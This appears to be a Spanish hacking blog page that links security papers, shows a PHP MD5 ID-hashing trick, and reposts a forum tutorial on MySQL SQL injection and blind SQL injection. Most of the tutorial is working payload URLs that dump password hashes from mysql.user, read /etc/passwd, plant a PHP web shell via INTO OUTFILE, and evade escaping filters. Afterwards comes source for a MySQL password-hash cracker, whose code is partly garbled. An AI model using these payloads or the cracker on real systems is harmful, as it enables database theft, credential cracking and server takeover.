    http://serdis.dis.ulpgc.es/~ii-cript/PAGINA%20WEB%20CLASICA/index-pagina%2520web.html

    http://serdis.dis.ulpgc.es/~ii-cript/PAGINA%20WEB%20CLASICA/index-pagina%20web.html ---documentacion de cripto

    http://www.pburkholder.com/sysadmin/SSL-mitm/ --documentacion de webmit

    http://www.pburkholder.com/sysadmin/SSH-talk/img20.htm

    repaso de tecnicas sql inyeccion

    0 comentarios
    Este paper es muy bueno , es un repaso de tecnicas sql inyeccion, es algo viejo pero sige vigente y sobre todo es uno de los mejores en espan'ol :D.
    En conclusion es Otro paper para la coleccion :D

    saludos


    http://www.newbie.cl/nb/wp-content/uploads/2007/08/tecnicas-de-sql-injection-un-repaso.pdf

    Creando un HASH de ida y vuelta con MD5 en php.

    0 comentarios

    Pongamos un ejemplo: tengo un clásico listado de noticias y su respectivo detalle. En el listado propago el id de la noticia para saber cual levantar en el archivo de detalle (la típica noticias.php?id=1), pero que pasa si quiero proteger la identidad de dicho id? Puedo ofuscarlo pero no sería realmente una protección segura, o lo mejor, puedo hacer de éste un HASH pero no tendría vuelta (recordemos que un HASH no tiene vuelta) y en el caso de ser un id (un simple valor int) puedo usar brutal force para saber cual es el valor nativo con un simple for.
    A continuación les mostraré que se puede generar un hash seguro, y no solo eso, sino que lo podré usar para comparar con el id real, aunque lo mejor es que será de manera simple.

    No voy a explicar experiencias alternativas que he tenido con esto en este post, voy a ir al grano ejemplificando con php y mysql.
    Supongamos que tenemos dos archivos, noticias_listados.php y noticias_detalles.php. En la primera tendré links del estilo:


    ”>

    Todo lo que necesitare para continuar es una key que será un simple string declarado en un variable que tendré en un archivo en común (puede ser el de la conexión a la base de datos):

    $key = ‘cu4n70_m4s_c0mpl3j0_m3j05’;

    No tiene que ser largo, pero si le podemos poner caracteres especiales como un #o o un &, %, /,;,(,),etc, como si fuera un password nuestro.

    Una vez ésto, para imprimir haremos:


    ”>

    Lo que hacemos acá es meter la key que solo nosotros conocemos concatenada del id y generar un HASH usando MD5 (generalmente no dará de 32 caracteres, 16 en modo binario). De ésta manera tendremos en pantalla de nuestro browser algo como:

    Esto es una noticia con su id HASEADO

    Perfecto, acá ya logramos tener un id totalmente camuflado, y no solo eso, sino que de manera segura!.

    Ahora, en el detalle solíamos hacer algo como:

    $sql = “Select * from noticias where id = ‘$id’ ”;

    Y se preguntaran como hacemos para volver este string de 32 caracteres al valor numérico que necesitamos; y la respuesta es que NO lo haremos, sino que transformaremos del lado de mysql los id en conjunto con nuestra key al momento de comparar. El código es simple:

    $sql = “Select * from noticias where MD5(concat(’”.$key.”‘,id)) = ‘$id’”;

    Con eso tenemos resulesto nuestro problema, no mostramos más nuestros id y nadie sabe como trabajamos internamente, lo que nos da un poco más de seguridad.

    Aclaro que los valores que usamos en los where (variable $id) es una variable seteada previamente con el GET[‘id’] y limpia de malas intenciones, y lo mismo con otras variables como ser por ejemplo $r. Es solo una idea de como implementar este método, cualquier consulta será bienvenida.


    Fuente:http://my2bits.wordpress.com/2007/09/19/creando-un-hash-de-ida-y-vuelta-con-md5-en-php/

    Documentacion para amantes de la seguridad informatica3

    0 comentarios
    http://crackx.webcindario.com/read.php?art=1 ---vulnerabilidades comunes en php

    http://crackx.webcindario.com/read.php?art=13 ---rompiendo stacks XD

    http://crackx.webcindario.com/read.php?art=11 ---RFI

    http://crackx.webcindario.com/read.php?art=103 --jugando con cookies


    http://crackx.webcindario.com/read.php?art=14 --exploits y stack over flows

    http://crackx.webcindario.com/read.php?art=101 --- phpbb 2.0.12 exploit

    http://crackx.webcindario.com/read.php?cat=1 --todos los documentos, tambien pueden buscar programas , otros textos , etc.. muy recomendada la pagina

    Gran tutorial sobre inyecciones sql en MySQL

    2 comentarios
    Bueno , hago otro echo :D de las mejores comunidades ahora le toca a elhacker.net , este post fue hecho por z1x2c3z1x2c3| para esta comunidad.

    para ver las imagenes deben visitar la fuente original , adjunta en la parte final :D

    saludos

    -----------------------------------------------------------------------------------------------------

    tip's,errores y demàs .. son bienvenidos.

    +--------------------------------------------------------
    | |
    | SQL injection && Blind Sql Injection |
    | |
    | Escrito por q7w8e9 |
    | |
    +--------------------------------------------------------

    ¿Qué es sql injection?

    "Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la
    base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las
    partes del programa con código SQL. Es, de hecho, un error de una clase más general de
    vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté
    incrustado dentro de otro.
    Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro
    código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código
    "invasor" en la base de datos."

    Fuente:
    http://es.wikipedia.org/wiki/Inyección_SQL

    ¿Qué vamos a ver?

    Hablare de sql injection/blind sql injection en base de datos MySQL versión 4.x y 5.x. Algunas
    cosas explicadas aquí quizás no funcionen en otras base de datos ya que no todas las bases de datos
    son iguales hay variedades de ellas... mysql, mssql (sql server), sqlite, oracle etc ..

    Antes de empezar vamos a repasar algunas cosas básicas:

    ? enlaza la URL con los parámetros a pasar.
    & delimita donde termina un parámetro y donde comienza el otro
    = asigna el valor


    Recuerdalos bien ;).


    Empecemos ...

    Nota: En los ejemplos usare siempre "localhost" y el nombre del script "print.php"


    ¿Cómo buscar y saber que una aplicación web se afronta a poseer vulnerabilidad de sql injection?

    Hay varias formas de hacerlo .. entre ellas la mas común es usar una comilla simple ' (''%27'') al
    final de la URL:

    http://localhost/print.php?id=332'

    La siguiente forma es usar un paréntesis ")" donde haría que la aplicación produzca un error o
    también podríamos usar algún comentario que pueden ser ''/*'' , ''--'' o "#" (el tema de los comentarios puede ser que con un comentario funcione y con el otro no .. por ejemplo:

    Con /*:




    Con --:





    al final de la url y así provocaría un error ... o usando palabras del mismo lenguaje como select
    order by o algún carácter

    Ejemplos:

    http://localhost/print.php?id=12) --
    http://localhost/print.php?id=12)) --
    http://localhost/print.php?id=12 '--
    http://localhost/print.php?id=12 ') --
    http://localhost/print.php?id=12 ')) --

    veamos:




    Aunque hay otra forma usando operadores logicos de MySQL ..

    Solo agregando al final de la url algo como:

    http://localhost/print.php?id=1 and 1=1

    Y luego:

    http://localhost/print.php?id=1 and 1=2

    No solo se puede usar AND existen otros operadores lógicos:

    1 && 1 //Representa el AND
    1 || 1 //Representa el OR
    1 XOR 0 //Retorna null si alguno de ellos es null
    ! //Representa NOT se evalúa 1 si el operando es 0 y a 0 si el operando es distinto a 0.

    Veremos que al hacer la primera inyección la pagina la devolverá normalmente ... pero al inyectar la
    segunda se ha modificado! (a veces vacía o falta algún contenido, se notara la diferencia).
    Si al hacer algunas de estas inyecciones obtenemos algo como: "You have an error in your SQL
    syntax; check the manual that " o algo parecido o quizás nada pero... sabremos que es vulnerable a
    sql injection.







    Explorando la base de datos

    Vamos a averiguar el numero de columnas ...

    ¿Cómo hacemos eso? ¡Fácil!, usamos el 'order by' e iremos incrementando o viceversa según los
    resultados veamos.

    http://localhost/print.php?id=-1 order by 1/* <---- no muestra un error
    http://localhost/print.php?id=-1 order by 2/* <---- no muestra un error
    ...
    http://localhost/print.php?id=-1 order by 14/* <-------- no muestra un error
    http://localhost/print.php?id=-1 order by 15/* <-------- no muestra un error
    http://localhost/print.php?id=-1 order by 16/* <-------- no muestra un error
    http://localhost/print.php?id=-1 order by 17/* <-------- error

    Cuando hay un error nos mostrara algo así:

    "Unknown column '17' in 'order clause"

    Como podemos ver hay 16 columnas.








    Pero hay veces que esto no es posible y tendremos que usar UNION (Sentencia UNION: Se usa
    para combinar los resultados de varias sentencias SELECT en un único conjunto de resultados.)
    http://localhost/print.php?id=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    Ahí la pagina nos puede imprimir unos números o tal vez puede verse que falta de algun contenido pero
    sabremos que la union funciona,pero podremos usar el método:

    union all select 1/*
    union all select 1,2/*
    union all select 1,2,3/*
    ..
    y así sucesivamente hasta encontrar la cantidad de columnas.


    Sabiendo la versión de mysql y otros datos útiles

    Bueno ahora analicemos la inyección de más arriba ..

    http://localhost/print.php?id=-1+union+all+select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    Como pueden ver es que no explique el -1 .. no quiere decir que siempre hay que ponerlo .. pueden usar
    cualquier numero.
    También hay veces que al usar algún tipo de comentario como puede ser --,/* o # veremos que pueden
    funcionar todos,2 y solo 1 de ellos en la inyección .. así que a probar! (como dije arriba)

    Lo que hay que hacer ahora es reemplazar algún numero que se esté impreso en pantalla por algunas de
    las inyecciones que podrían darnos algunos datos interesantes del servidor (estos números corresponde a
    una columna de la tabla).

    Ver la versión:

    http://localhost/print.php?id=-1+union+all+select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16/
    *

    (se pude usar @@version o version())

    Ejemplo:




    (se pude usar @@version o version())

    Tendrás algo como "4.1.20-log"

    Los @@ son variables del sistema,por ejemplo podríamos hacer algo como @@servename.

    Es importante saber que versión de MySQL estamos analizando ya que podría facilitarnos la inyección y
    sacar algunos datos importantes veamos:

    version() Devuelve la versión del servidor MySQL.
    database() Devuelve el nombre de la base de datos actual.
    current_user() Devuelve el nombre de usuario y el del host para el que está autentificada la
    conexión actual. Este valor corresponde a la cuenta que se usa para evaluar los privilegios de
    acceso. Puede ser diferente del valor de USER().
    last_insert_id() Devuelve el último valor generado automáticamente que fue insertado en una
    columna AUTO_INCREMENT.
    connection_id() Devuelve el ID de una conexión. Cada conexión tiene su propio y único ID.
    @@datadir directorio de la db.

    Algunos seguro tendran este problema que es algo frecuente y es eso de:

    ¿Por qué me dice que es ilegal, implícita etc ..?

    ok .. vamos a ver como evitarlo y se hace de la siguiente manera:

    Bueno en este caso tendremos que usar la función convert().

    http://localhost/print.php?id=-1+union+all+select 1,convert(@@version using
    latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    o con hex() y unhex():

    http://localhost/print.php?id=-1+union+all+select
    1,unhex(hex(@@version)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    Bueno hasta aca ya recolectamos bastantes datos interesantes del servidor y ademas sabemos como ver si es vulnerable o no .. ahora seguimos.

    Algunas veces nos podemos encontrar con filtros .. filtros que nos lian las inyecciones pero hay varias forma de pasarse filtros por ejemplo podríamos hacer algo como:

    http://localhost/print.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(@@versión)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    http://localhost/print.php?id=-1/**/uNion/**/aLl/**/sElEcT/**/1,unhEx(hex(@@versión)),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

    Lo mismo hablare sobre esto mas adelante.


    Obteniendo tabla,nombre de columna y otros datos

    Vamos a ver como hacer al tener una versión 5 de MySQL:

    Para listar los privilegios podríamos hacer:

    http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,privilege_type,is_grantable),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

    Como podemos ver hay algo nuevo y es concat (devuelve la cadena resultante de concatenar los argumentos).
    Con esto nos ahorraríamos de hacer inyecciones .. sabemos que al usar concat,algunos de los datos que
    pudiéramos sacar de la base por ejemplo no existiera nos largaría un error o cuando no hubiera contenido
    nos largaría NULL.
    Al hacer esto vemos que todo sale muy junto ..¿Cómo podemos evitar esto?

    Podemos pasar algún carácter a hexadecimal o usando char() (pasar a valor ascii).

    http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable)3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

    Vemos que 0x3a es un valor en hex y representa ":"
    Entonces obtendremos algo así:

    ''primerdato:segundodato'' y no ''primerdatosegundodato''

    Y así con cualquier carácter como he dicho por ejemplo "=" en hexa (0x3D) Obtendríamos:

    ''primerdato=segundodato''

    Y en ascii:

    http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,char(58),privilege_type,char(58),is_grantable)3,4,5,6,7,8,
    9,10,11,12,13,14,15,16+from+information_schema.user_privileges/*

    Ejemplo:




    y ..




    Como podemos ver en la segunda imagen aparece unos : (dos puntos)

    o con char():




    como podemos ver lo separamos con ^ y claro! podremos usar cualquier caracter.

    Nota: Para saber los valores ascii: http://www.ascii.cl/es/

    o Sencillo script en perl para pasar una cadena de caracteres a HEX:

    Código:
    print "Enter string to encode:";
    $str=;chomp $str;
    $enc = encode($str); print "Hex Encoded value: 0x$enc\n";
    sub encode{ #Sub to encode
    @subvar=@_;
    my $sqlstr =$subvar[0];
    @ASCII = unpack("C*", $sqlstr);
    foreach $line (@ASCII) {
    $encoded = sprintf('%lx',$line);
    $encoded_command .= $encoded;
    }
    return $encoded_command;
    }

    Tambien antes de hacer esto podriamos usar concat_ws() (concat_ws() utiliza el primer argumento para separar el resto de los argumentos:




    o simplemente aprovechar los numeros que larga y poner en cada numero algo por ejemplo:




    como ven puse que muestre la base de datos,la tabla y la columna .. aprovechando los numeros que habia largado.

    en este caso blog es la base .. blog_lb_authors es la tabla y id es la columna.


    Bueno seguimos ..
    Ahí mostramos una forma de sacar una lista de privilegios pero hay otras formas:

    http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,Select_priv,0x3a,Insert_priv,0x3a,Update_pri
    v,0x3a,Delete_priv,0x3a,Create_priv,0x3a,Drop_priv,0x3a,Reload_priv,0x3a,Shutdown_priv,0x3a,P
    rocess_priv,0x3a,File_priv,0x3a,Grant_priv,0x3a,References_priv,0x3a,Index_priv,0x3a,Alter_priv,
    0x3a,Show_db_priv,0x3a,Super_priv,0x3a,Create_tmp_table_priv,0x3a,Lock_tables_priv,0x3a,Exe
    cute_priv,0x3a,Repl_slave_priv,0x3a,Repl_client_priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+m
    ysql.user--

    http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,table_schema,0x3a,privilege_type),3,4,5,6,7,8,9,10,
    11,12,13,14,15,16+FROM+information_schema.schema_privileges--
    http://localhost/print.php?
    id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3a,privileg
    e_type),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_schema.column_privileges--

    Para sacar una lista sobre las base de datos:

    http://localhost/print.php?id=-1+union+all+select+1,schema_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_s
    chema.schemata--

    http://localhost/print.php?id=-1+union+all+select+1,distinct(db),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+mysql.db--

    Para sacar una lista de columnas:

    http://localhost/print.php?
    id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,
    10,11,12,13,14,15,16+FROM+information_schema.columns--

    Otra cosa que se puede hacer es leer algún archivo local como puede ser "/etc/passwd":

    http://localhost/print.php?id=-1+union+all+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14,15,1
    6--

    El /etc/passwd esta en hex.

    Ejemplo:




    o obtener un user y pass de la db y poder acceder remotamente a ella:

    http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6,7,8,9,
    10,11,12,13,14,15,16+FROM+mysql.user--

    Ejemplo:




    como podemos ver tiro el host,el usuario y por supuesto el password .. ahora lo que nos queda es crackear el
    hash (pueden usar john the ripper etc ..) y scanear a ver si por esas casualidades tiene la posibilidad de que tenga el puerto de base de datos abierto.

    Ejemplo:




    y podernos conectar remotamente:




    y luego buscando cosas interesantes:




    Nota: se puede usar cualquier cliente mysql en este caso uso la c99.


    Una forma para intentar buscar nombres de columnas:

    Buscando algún nombre de tabla .. en este caso largo auth ..

    http://localhost/print?id=-1 union all select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16 from
    information_schema.tables where table_schema = database()

    Pasando valor a ascii y buscando ..

    http://localhost/print.php?id=-1 union all select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from information_schema.columns where table_name = char(97,117,116,104) and column_name
    like char()

    Pasar en ascii "%a%" quedando:

    http://localhost/print.php?id=-1 union all select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16
    from information_schema.columns where table_name = char(97,117,116,104) and column_name
    like char(37,97,37)

    En esta inyección por ejemplo estaríamos buscando un nombre de columna pasadas en ascii.
    Y ahí te larga palabras y luego obtener datos :)

    Sacando demàs tablas,columnas etc .. de la base:

    Bueno hay algunas veces que al hacer una inyeccion y hacer algo así:

    -1 union all select table_name from information_shchema.tables

    obtendremos todas todas las tablas impresas de una sola vez .. pero otras veces no ..

    por ejemplo:




    Como podemos ver tira todas las tablas .. en cambio en esta no:





    así que para ver la siguiente tabla usaremos limit al final de la url ejemplo:

    -1 union all select 1,2,3,4,5,6 from information_schema.tables limit 1,1--

    Ejemplo:




    como podemos ver saco la siguiente tabla .. solo nos quedaria incrementar limit ..

    -1 union all select 1,2,3,4,5,6 from information_schema.tables limit 2,1--
    -1 union all select 1,2,3,4,5,6 from information_schema.tables limit 3,1--
    ..
    -1 union all select 1,2,3,4,5,6 from information_schema.tables limit 15,1--

    etc .. entendido? Ok, esto del limit lleva mucho tiempo .. por que saca datos de toda la base de datos
    al menos que evitemos lo que no queremos ver :P ejemplo ..

    en mysql existen 2 base de datos una se llama information_schema y la otra mysql .. (Instalen mysql y exploren lo que hay dentro de ellas)

    pero si de verdad necesitamos evitarlas con el fin de encontrar algun password de algun panel de administracion etc .. podemos hacer algo así:

    1+union+all+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+WHERE+table_schema!=0x6d7973716c+AND+table_schema+!=0x696e666f726d6174696f6e5f736368656d61+limit+100,1--

    como podemos ver .. pase information_schema y mysql a HEX logrando que evite buscar alguna informacion en ellas.

    aparte de usar limit podriamos usar group_concat() lo que haria es largar nombres de tabla pero no todas ejemplo:




    y para evitar el tema de que aparezca todo junto podriamos hacer algo así:




    como podemos ver puse: 0x3C62723E que seria un salto de linea en html osea
    .


    ¿Para qué podría servir todo esto?

    Desde leer archivos de configuraciones, archivos en si, etc .. solo es
    cuestión de imaginación como por ejemplo obtener una shell del servidor haciendo algo como:

    UNION SELECT "",2,3,4 INTO OUTFILE
    "/var/www/html/mishell.php" --

    por ejemplo: (Una vez echa la inyeccion)




    y usando la shell:




    Lo que estaríamos haciendo es metiendo el contenido de un script en php y guardándolo en alguna parte
    del servidor.

    si necesitan la ruta del servidor pueden verla en /etc/passwd ejemplo:

    apache:x:48:48:Apache:/var/www:/sbin/nologin

    o usar alguna tecnica como Full Path Disclosure:

    http://www.owasp.org/index.php/Full_Path_Disclosure

    Para hacer esto y algunas inyecciones más,necesitamos saltarnos las magic_quotes que son las que no
    nos dejan hacer nuestras inyecciones con eficiencia :P para eso existen algunas formas ..

    Como el "double encoding" bastante interesante y leer

    (http://www.owasp.org/index.php/Double_Encoding)

    hex encoding

    para saltar filtros como las magic_quotes leer sobre "SQL Smuggling".

    También como he leído por ahí .. podríamos saltar algunos de los filtros que posee PHP veamos:
    -------------------------------------------------------
    (MySQL 4.1.x o posterior: 4.1.20 y 5.0.x)
    bypass a addslashes() con codificaciòn GBK
    WHERE x = 0xbf27admin 0xbf27
    -------------------------------------------------------
    bypass mysql_real_escape_string() con BIG5 o GBK
    se pueden poner caracteres chinos no hemos puesto el ejemplo por problemas de codificacion
    pero es posible saltarse el mysql_real_escape() de esta forma.
    aparte de ser caracteres chinos es BIG5 :P
    -------------------------------------------------------
    Vectores avanzados:

    Usando HEX para bypassear una consulta:

    Consulta normal:

    SELECT * FROM login WHERE user = 'root'

    Bypass:

    SELECT * FROM login WHERE user = 0x726F6F74

    Insertando nuevo usuario en SQL.


    Consulta Normal:
    insert into login set user = ‘root’, pass = ‘root’

    Bypass:

    insert into login set user = 0×726F6F74, pass = 0×726F6F74
    --------------------------------------------------------
    Como determinar el HEX? bueno se puede usar el programita de perl màs arriba o simplemente haciendo
    algo como:

    SELECT HEX('root');
    obtendremos algo como:
    726F6F74
    y luego le agregamos:
    0x
    quedaría: 0×726F6F74

    Tambien hace poco me encontre un articulo interesante del amigo xianur0 :P:

    http://xianur0.blogspot.com/2008/10/rootear-servidor-mediante-sql-injection.html

    seria bueno que lo lean.

    Para ver si las magic_quotes estan activadas simplemente agreguen una ' (comilla siemple) si aparece algo así:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

    es que no es posible por que aparece una barra invertida provocando un error en la base de datos ..

    pero si aparece algo así:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    sabremos que no pasa nada con la comilla simple y tendremos màs posibilidades .. y inyecciones no tan complejas ademàs de poder actualizar datos,borrar etc ..

    Ahora blind sql injection

    Creo que es lo más difícil pero no imposible. Puede ser un poco cansado pero obtendremos
    algunos frutos (?).

    Sabiendo si es vulnerable a Bsql

    Tenemos que saber esto:

    http://localhost/print.php?id=-1 and 1 = 1 <--- esto siempre sera verdadero.
    http://localhost/print.php?id=-1 and 1 = 2 <--- esto siempre sera falso.

    Nota: Recordarlo siempre.

    Si luego de probar http://localhost/print.php?id=-1 and 1 = 2 no regreso algo de la pagina, un texto o
    etc sabemos que es vulnerable a bsql.

    Sabiendo la versión de mysql:

    http://localhost/print.php?id=-1 and substring(@@versión,1,1)=4 <--- si nos larga la pagina normal
    (si es verdadero) sera versión 4.

    http://localhost/print.php?id=-1 and substring(@@versión,1,1)=5 <--- si nos larga la pagina normal
    (si es verdadero) sera versión 5.

    Podemos usar select pero si tenemos problemas podremos usar subselect.

    http://localhost/print.php?id=-1 and (select 1 from mysql.user limit 0,1)=1

    Si nos larga verdadero tendremos acceso a mysql.user y podremos obtener ficheros del servidor
    como /etc/password y etc ... usando load_file() y outfile.

    Buscando nombre de tabla y columna

    Puede ser difícil y con ganas de cagarte en muchas cosas xD.

    Adivinando la tabla:

    Hacemos esto:

    http://localhost/print.php?id=-1 and (select 1 from members limit 0,1)=1

    Nota: con LIMIT 0,1 nuestra consulta devuelve 1 fila de datos por causa de subselect por eso es
    importante. RECODARLO

    Si la pagina carga normalmente sabremos que el nombre de la tabla es la correcta si esto no es así
    tendremos que seguir adivinando.

    Ahora la columna:

    http://localhost/print.php?id=-1 and (select substring(concat(1,password),1,1) from members limit
    0,1)=1

    Si la pagina carga normalmente sabremos que es la correcta de lo contrario a adivinar /* :@ */

    Extrayendo datos

    Supongamos que ya tenemos nombre de la columna y la tabla:

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>80

    El 80 es un carácter en ascii si nos da falso tenemos que aumentar hasta que de verdadero.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>95

    Da falso así que incrementamos.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>95
    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>98

    Nos da falso.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),1,1))>99

    Verdadero!

    Por lo que el primer carácter en el nombre de usuario es char(99). Y convirtiéndolo a ascii sabemos
    que char (99) es la letra c.

    Entonces vamos a comprobar el segundo carácter:

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>99

    Fíjense que estoy cambiado, a 1,1, 2,1 para obtener el segundo carácter, ahora vuelve el segundo
    carácter, 1 carácter de longitud.

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>99

    Nos da falso e incrementamos:

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>107

    Nos da falso y buscamos un numero menor.

    http://localhost/print.php?id=5 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>104

    Falso, incrementamos ..

    http://localhost/print.php?id=-1 and ascii(substring((SELECT concat(usuario,0x3a,password) from
    members limit 0,1),2,1))>105

    Verdadero!

    Sabemos que el segundo carácter es char(105) y que es ''i'' vamos ''ci'' y seguimos incrementando,
    cuando > 0 devuelve falso, sabemos que llegamos al final.


    Hay herramientas que hacen que esto no sea muy pesado:

    http://www.seguridadinformatica.es/profiles/blog/show?id=1024177%3ABlogPost%3A16301

    Les recomiendo leer el tutorial que hizo ka0x que contiene un script donde podemos aplicar los
    conocimientos de aquí y el que he usado a lo largo del tutorial :).(http://www.milw0rm.com/papers/download/216)

    MySQL cheat sheet:
    http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

    MySQL cheat sheet: http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/ (Màs que interesante)

    La intencion de este tutorial es simplemente informar y enseñar a otros usuarios lo que podemos
    hacer con este tipo de vulnerabilidades, ninguno nos responsabilizamos del mal uso que pueda
    hacerse de el, sin mas, espero que os sirva!!

    TODA LA LECTURA ES OBLIGATORIA

    Dudas? l0ve@hslteam.org

    o publiquen su duda en este post.

    Saludos!

    ---------------------------------

    tools:

    el soft que use para desencriptar el pass:

    mysqlfast.c

    Código:
    /* This program is public domain. Share and enjoy.
    *
    * Example:
    * $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
    * $ mysqlfast 6294b50f67eda209
    * Hash: 6294b50f67eda209
    * Trying length 3
    * Trying length 4
    * Found pass: barf
    *
    * The MySQL password hash function could be strengthened considerably
    * by:
    * - making two passes over the password
    * - using a bitwise rotate instead of a left shift
    * - causing more arithmetic overflows
    */

    #include

    typedef unsigned long u32;

    /* Allowable characters in password; 33-126 is printable ascii */
    #define MIN_CHAR 33
    #define MAX_CHAR 126

    /* Maximum length of password */
    #define MAX_LEN 12

    #define MASK 0x7fffffffL

    int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
    {
    int i, c;
    u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
    u32 newstate1, newstate2, newstate3;
    u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
    u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
    i = -1;
    sum = 7;
    state1_ary[0] = 1345345333L;
    state2_ary[0] = 0x12345671L;

    while (1) {
    while (i < stop) {
    i++;
    pass_ary[i] = MIN_CHAR;
    step_ary[i] = (state1_ary[i] & 0x3f) + sum;
    xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
    sum += MIN_CHAR;
    state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
    state2_ary[i+1] = state2_ary[i]
    + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }

    state1 = state1_ary[i+1];
    state2 = state2_ary[i+1];
    step = (state1 & 0x3f) + sum;
    xor1 = step*MIN_CHAR + (state1 << 8);
    xor2 = (state2 << 8) ^ state1;

    for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
    newstate2 = state2 + (xor1 ^ xor2);
    newstate1 = state1 ^ xor1;

    newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
    div = (newstate1 & 0x3f) + sum + c;
    diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
    if (diff % div != 0) continue;
    d = diff / div;
    if (d <> MAX_CHAR) continue;

    div = (newstate3 & 0x3f) + sum + c + d;
    diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
    if (diff % div != 0) continue;
    e = diff / div;
    if (e <> MAX_CHAR) continue;

    pass_ary[i+1] = c;
    pass_ary[i+2] = d;
    pass_ary[i+3] = e;
    return 1;
    }

    while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
    sum -= MAX_CHAR;
    i--;
    }
    if (i < 0) break;
    pass_ary[i]++;
    xor_ary[i] += step_ary[i];
    sum++;
    state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
    state2_ary[i+1] = state2_ary[i]
    + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }

    Post del mismo tema en el hacker.net


    Tutorial de Inyección SQL. (SQL Injection)
    http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_inyeccion_sql_sql_injection-t98448.0.html

    SQL Injection para principiantes, ejemplos en aplicaciones reales
    http://foro.elhacker.net/bugs_y_exploits/sql_injection_para_principiantes_ejemplos_en_aplicaciones_reales-t142203.0.html

    FUENTE ORIGINAL:

    http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t237420.0.html
    Powered by Bad Robot
    Helped by Blackubay